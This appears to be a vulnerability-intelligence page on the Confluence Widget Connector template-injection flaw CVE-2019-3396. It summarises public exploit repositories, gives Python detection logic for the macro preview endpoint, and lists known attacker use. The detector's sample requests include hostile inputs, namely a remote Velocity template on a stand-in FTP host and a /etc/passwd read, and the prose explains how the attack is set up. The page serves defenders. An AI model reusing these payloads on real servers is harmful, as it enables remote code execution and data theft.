Atlassian Confluence Widget Connector SSTI RCE
CVE-2019-3396 is a server-side template injection vulnerability in the Widget Connector macro component of Atlassian Confluence Server and Data Center. Affected versions are Confluence Server before 6.6.12 in the 6.6.x branch, 6.7.0 up to but not including 6.12.3, 6.13.0 up to but not including 6.13.3, and 6.14.0 up to but not including 6.14.2. The root cause is a programming error in the Widget Connector macro: the macro accepted a caller-supplied template location, so a remote attacker could point the renderer at a Velocity template of their choosing. This yields server-side template injection, which can also be leveraged for path traversal and ultimately remote code execution on the Confluence host.
Exploits
3 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (4 hidden).
This repository provides a working exploit for CVE-2019-3396, a critical remote code execution (RCE) vulnerability in Atlassian Confluence (affected versions 6.6.0 through 6.6.11, 6.7.0 through 6.12.2, 6.13.0 through 6.13.2, and 6.14.0 through 6.14.1). The vulnerability is a server-side template injection (SSTI) in the Widget Connector macro that lets unauthenticated attackers execute arbitrary system commands on the server. The repository contains four files:
- `README.md`: Detailed description of the vulnerability, affected versions, exploitation steps, and mitigation advice.
- `poc.py`: A Python proof-of-concept script that automates exploitation. It sends a crafted POST request to the vulnerable `/rest/tinymce/1/macro/preview` endpoint, instructing the server to fetch and render a malicious Velocity template from an attacker-controlled FTP server. The script takes the target URL and a command to execute as arguments and prints the command output if successful.
- `cmd.vm`: The malicious Velocity template that executes arbitrary system commands on the target server and returns their output.
- `LICENSE`: Creative Commons CC0 license.
To use the exploit, the attacker hosts `cmd.vm` on an FTP server (e.g., using `pyftpdlib`), then runs `poc.py` with the target Confluence URL and the desired command. The exploit is operational and provides full remote code execution. The attack vector is network-based, targeting the Confluence REST API endpoint. The repository also demonstrates file read (e.g., reading `/etc/passwd`). No detection scripts are included; the code is focused on exploitation. The exploit is self-contained and not part of a larger framework.
This repository provides a working exploit for CVE-2019-3396, a server-side template injection (SSTI) vulnerability in Atlassian Confluence's `/rest/tinymce/1/macro/preview` endpoint. The main exploit script (`RCE_exp.py`) is written in Python and lets an attacker execute arbitrary system commands on a vulnerable Confluence server. It works by instructing the target server to fetch and process a malicious Velocity template (`cmd.vm`) hosted by the attacker over FTP or HTTPS; `cmd.vm` contains Velocity code that executes the command passed in the HTTP request. The repository includes:
- `RCE_exp.py`: The main exploit script, which can read files or execute commands on the target.
- `cmd.vm`: The malicious Velocity template used to trigger command execution.
- `README.md`: Usage instructions and a brief description of the exploit.
The attacker must host `cmd.vm` on an FTP or HTTPS server and supply the target Confluence URL and the desired command as arguments. The exploit is operational and demonstrates successful command execution, returning the output to the attacker.
This repository provides a working exploit for CVE-2019-3396, a remote code execution vulnerability in Atlassian Confluence. The exploit consists of a Python script (cve-2019-3396.py) that sends a crafted POST request to the vulnerable /rest/tinymce/1/macro/preview endpoint. The request abuses the macro preview functionality by supplying a _template parameter that points to a malicious Velocity template (r.vm) hosted on an attacker-controlled FTP server. This template enables arbitrary command execution on the target server. The README.md provides detailed usage instructions, including how to set up the FTP server, example payloads for file reading, command execution, and reverse shell access. The exploit is operational and demonstrates full RCE capabilities, including file read, command execution, and reverse shell. The main fingerprintable endpoints are the Confluence macro preview API and the attacker's FTP server hosting the malicious template.
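All three exploits above share one observable shape: a POST to `/rest/tinymce/1/macro/preview` whose JSON body carries a `_template` parameter pointing at an attacker-hosted Velocity template over `ftp://`, `http://` or `https://`. The following detection logic, written for this page and not taken from any of the repositories, classifies captured requests on that basis. It assumes the body is JSON and walks it for any `_template` key rather than relying on one exact nesting (the `macro` / `params` structure in the sample is an assumption modelled on the public PoCs); treating a `file://` value as a local file read is likewise an assumption consistent with the path traversal and `/etc/passwd` reads described above. The sample requests are constructed, not captured traffic.

```python
import json
from urllib.parse import urlsplit

PREVIEW_ENDPOINT = "/rest/tinymce/1/macro/preview"
# Schemes the public exploits use to make Confluence fetch a remote .vm file.
REMOTE_SCHEMES = {"ftp", "http", "https"}


def find_template_params(obj):
    """Yield every value stored under a '_template' key anywhere in the body.

    The nesting differs between tools (macro -> params -> _template is the
    common shape, but that is an assumption), so the whole JSON is walked."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            if key == "_template":
                yield value
            yield from find_template_params(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from find_template_params(item)


def classify_request(method, path, body):
    """Return (verdict, reason) for one request seen by a proxy or WAF.

    Verdicts: 'ssti' (remote template fetch), 'lfi' (file:// template,
    assumed local read), 'suspicious' (_template present but unexpected
    form, or unparsable body), 'benign'."""
    if method.upper() != "POST" or not path.startswith(PREVIEW_ENDPOINT):
        return ("benign", "not a macro preview POST")
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return ("suspicious", "macro preview POST with non-JSON body")
    templates = [t for t in find_template_params(data) if isinstance(t, str)]
    if not templates:
        return ("benign", "macro preview without _template")
    for tpl in templates:
        scheme = urlsplit(tpl).scheme.lower()
        if scheme in REMOTE_SCHEMES:
            return ("ssti", "remote Velocity template requested: " + tpl)
        if scheme == "file":
            return ("lfi", "local file requested as template: " + tpl)
    # Legitimate editor previews of the Widget Connector never set _template,
    # so any remaining value (e.g. a relative path) still warrants a look.
    return ("suspicious", "_template set without URL scheme: " + templates[0])


# Constructed sample traffic for this example (not real captures).
SAMPLE_REQUESTS = [
    ("GET", "/rest/api/content/12345", ""),
    ("POST", PREVIEW_ENDPOINT, json.dumps({
        "contentId": "12345",
        "macro": {"name": "widget", "body": "",
                  "params": {"url": "https://www.youtube.com/watch?v=abc"}}})),
    ("POST", PREVIEW_ENDPOINT, json.dumps({
        "contentId": "12345",
        "macro": {"name": "widget", "body": "",
                  "params": {"url": "https://www.youtube.com/watch?v=abc",
                             "_template": "ftp://198.51.100.7/cmd.vm"}}})),
    ("POST", PREVIEW_ENDPOINT, json.dumps({
        "contentId": "12345",
        "macro": {"name": "widget", "body": "",
                  "params": {"url": "https://www.youtube.com/watch?v=abc",
                             "_template": "file:///etc/passwd"}}})),
]


def scan(requests=SAMPLE_REQUESTS):
    """Classify a batch of (method, path, body) tuples; returns the verdicts."""
    return [classify_request(m, p, b)[0] for m, p, b in requests]


if __name__ == "__main__":
    for (method, path, body), verdict in zip(SAMPLE_REQUESTS, scan()):
        print(verdict, method, path, classify_request(method, path, body)[1])
```

Because normal Widget Connector previews never carry `_template`, its mere presence on this endpoint is a high-signal indicator; the scheme check only distinguishes the remote-RCE variant from the local-read variant. A WAF rule built on the same condition is a stopgap until the instance is upgraded, and any hit should be treated as a compromise lead, not just a blocked request.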
Recent activity
11 sources tracked across advisories, community write-ups, and news.
A remote code execution vulnerability in Atlassian Confluence Server and Data Center, which can be exploited to execute arbitrary code on the server. It has been used by threat actors, including Lazarus Group, to deploy malware such as the Dacls RAT.
An Atlassian Confluence vulnerability referenced as being used with a working payload to spread the Dacls bot program.
A Confluence vulnerability used by attackers to infect outdated Linux servers with the Godlua malware.
A programming error in the Widget Connector macro component of Atlassian Confluence Server/Data Center products that is being actively exploited; the public PoC accelerated criminal exploitation and led to data breaches.